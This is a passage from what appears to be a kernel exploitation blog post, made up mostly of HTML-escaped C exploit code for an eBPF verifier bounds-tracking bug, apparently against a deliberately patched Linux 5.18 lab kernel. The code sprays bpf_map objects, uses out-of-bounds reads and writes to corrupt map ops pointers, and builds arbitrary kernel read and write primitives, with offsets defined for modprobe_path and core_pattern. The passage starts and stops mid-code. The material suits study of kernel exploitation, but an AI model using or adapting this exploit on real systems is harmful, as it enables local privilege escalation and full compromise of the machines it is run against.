      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr};
  write(socks[1], buf, sizeof(buf));
  bpf_map_lookup(mapfd, 0, &amp;amp;map_val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return map_val;
}

uint64_t bpf_map_addr = 0;

int main() {
  srand(time(NULL));
  char verifier_log[0x10000];

  make_corrupted_map();
  find_corrupted_map_and_leak_bpf_map_addr();

  if (corrupted_map_fd == 0) {
    puts(&amp;#34;[-] Failed to find corrupted bpf_map&amp;#34;);
    return -1;
  }
  printf(&amp;#34;[+] mapfd: %d\n&amp;#34;, mapfd);
  printf(&amp;#34;[+] corrupted_map_fd: %d\n&amp;#34;, corrupted_map_fd);
  printf(&amp;#34;[+] bpf_map_addr: 0x%016lx\n&amp;#34;, bpf_map_addr);

  puts(&amp;#34;[*] Restore corrupted map...&amp;#34;);
  uint64_t bpf_map_ops = aar64(bpf_map_addr) + 8;
  aaw64(bpf_map_addr, bpf_map_ops);

  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;h4 id=&#34;leak-addr-of-jit-code-using-oob-read--heap-spray&#34;&gt;Leak addr of JIT code using oob read &amp;amp; heap spray&lt;/h4&gt;



  &lt;div class=&#34;collapsable-code&#34;&gt;
    &lt;input id=&#34;254613798&#34; type=&#34;checkbox&#34; checked /&gt;
    &lt;label for=&#34;254613798&#34;&gt;
      &lt;span class=&#34;collapsable-code__language&#34;&gt;c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__title&#34;&gt;leak_jit_addr_using_oob_read.c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__toggle&#34; data-label-expand=&#34;Show&#34; data-label-collapse=&#34;Hide&#34;&gt;&lt;/span&gt;
    &lt;/label&gt;
    &lt;pre class=&#34;language-c&#34; &gt;
      &lt;code&gt;// Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    &amp;lt;               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    &amp;gt;               // `scalar_min_max_or` will handler the case
//    &amp;gt;               //__mark_reg32_known(dst_reg, var32_off.value);

#include &amp;lt;asm-generic/socket.h&amp;gt;
#include &amp;lt;fcntl.h&amp;gt;
#include &amp;lt;linux/bpf.h&amp;gt;
#include &amp;lt;stdint.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;sys/socket.h&amp;gt;
#include &amp;lt;sys/syscall.h&amp;gt;
#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;time.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

#include &amp;#34;bpf_insn.h&amp;#34;

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define BPF_MAP_OPS_LOOKUP_IDX 12
#define BPF_MAP_OPS_LOOKUP_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_LOOKUP_IDX * 8)
#define BPF_MAP_OPS_UPDATE_ELEM_IDX 13
#define BPF_MAP_OPS_UPDATE_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_UPDATE_ELEM_IDX * 8)
#define OPS_CONTAINING_RET_OFFSET (0xffffffff81c15fc8 - KERNEL_BASE)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue(&amp;#34;Press enter to exit...&amp;#34;);
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &amp;amp;attr);
  if (map_fd &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_CREATE)&amp;#34;);
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;amp;attr);
  if (res &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_UPDATE_ELEM)&amp;#34;);
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &amp;amp;attr);
}

int mapfd;
int map_spray_fd[0x100];
void make_corrupted_map() {
  uint64_t map_val = 1;

  puts(&amp;#34;[*] Spray struct bpf_map...&amp;#34;);
  for (int i = 0; i &amp;lt; sizeof(map_spray_fd) / 4; i++) {
    map_spray_fd[i] = bpf_map_create(sizeof(uint64_t), 1);
    bpf_map_update(map_spray_fd[i], 0, &amp;amp;map_val);
  }
  mapfd = map_spray_fd[0x81];

  char verifier_log[0x10000];

  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = map_elem
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_6),  // arg3 = r6 == map_elem
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(BPF_MUL, BPF_REG_ARG4,
                    0xf2 - 1),  // arg4 = (0xf2-1) * arg4 == (actual_val=0xf2-1;
                                // val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0xf2; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0xf2; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  char buf[0x100] = {
      0,
  };
  // Overwrite low byte of bpf_map-&amp;gt;ops
  // (https://elixir.bootlin.com/linux/v5.18.14/source/include/linux/bpf.h#L63)
  uint16_t ops_containing_ret_offset =
      (OPS_CONTAINING_RET_OFFSET - 8 * BPF_MAP_OPS_UPDATE_ELEM_IDX) &amp;amp; 0xffff;
  printf(&amp;#34;ops_containing_ret_offset: 0x%x\n&amp;#34;, ops_containing_ret_offset);
  *(uint16_t*)(&amp;amp;buf[0xf0]) = ops_containing_ret_offset;
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);
}

int corrupted_map_fd;
uint64_t jit_addr;
void find_corrupted_map_and_leak_bpf_map_addr() {
  char verifier_log[0x10000];

  for (int i = 0; i &amp;lt; sizeof(map_spray_fd) / 4; ++i) {
    int cur_map_fd = map_spray_fd[i];
    if (cur_map_fd == mapfd) {
      continue;
    }

    // uint64_t map_val = 0;
    // int ret = bpf_map_update(cur_map_fd, 0, &amp;amp;map_val);
    // printf(&amp;#34;ret: 0x%x, val: 0x%lx\n&amp;#34;, ret, map_val);

    struct bpf_insn insns[] = {
        // BPF_REG_ARG1 == struct __sk_buff
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                    -0x08),  // *(u64*)(fp-0x08) = skb

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, cur_map_fd),
        // arg2(&amp;amp;key) = fp-0x10 &amp;lt;- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&amp;amp;val) = fp-0x10 &amp;lt;- 0
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_ARG2),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x10, 0) or map_lookup_elem(mapfd,
        // fp-0x10) if corrupted
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0, -0x18),

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
        // arg2(&amp;amp;key) = fp-0x10 &amp;lt;- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&amp;amp;val) = fp-0x18 &amp;lt;- return value of map_update_elem or
        // map_lookup_elem.
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x18),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x18, 0)
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),
    };

    union bpf_attr prog_attr = {
        .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
        .insn_cnt = sizeof(insns) / sizeof(insns[0]),
        .insns = (uint64_t)insns,
        .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
        .log_level = 2,
        .log_size = sizeof(verifier_log),
        .log_buf = (uint64_t)verifier_log,
    };

    int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
    if (progfd &amp;lt; 0) {
      puts(&amp;#34;============[failed reason]============&amp;#34;);
      printf(&amp;#34;%s\n&amp;#34;, verifier_log);
      fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
    }

    int socks[2];
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
      fatal(&amp;#34;socketpair&amp;#34;);
    }
    if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
      fatal(&amp;#34;setsockopt&amp;#34;);
    }

    write(socks[1], &amp;#34;Hello&amp;#34;, 5);

    uint64_t val;
    bpf_map_lookup(mapfd, 0, &amp;amp;val);

    close(socks[0]);
    close(socks[1]);
    close(progfd);

    if (val != 0) {
      jit_addr = val;
      corrupted_map_fd = cur_map_fd;
      return;
    }
  }
}

uint64_t aaw64(uint64_t addr, uint64_t val) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0x10),
      // arg3(to) = addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP,
                  -0x18),  // arg3 = fp-0x18 == addr
      // arg4(len)
      BPF_MOV64_IMM(BPF_REG_ARG4, 8),
      // skb_load_bytes(skb, 0x10, addr, 8)
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr, val};
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return buf[0];
}
uint64_t aar64(uint64_t addr) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key)
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // arg3(&amp;amp;val)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr};
  write(socks[1], buf, sizeof(buf));
  bpf_map_lookup(mapfd, 0, &amp;amp;map_val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return map_val;
}

uint64_t jit_addr = 0;

int main() {
  srand(time(NULL));
  char verifier_log[0x10000];

  make_corrupted_map();
  find_corrupted_map_and_leak_bpf_map_addr();

  if (corrupted_map_fd == 0) {
    puts(&amp;#34;[-] Failed to find corrupted bpf_map&amp;#34;);
    return -1;
  }
  printf(&amp;#34;[+] mapfd: %d\n&amp;#34;, mapfd);
  printf(&amp;#34;[+] corrupted_map_fd: %d\n&amp;#34;, corrupted_map_fd);
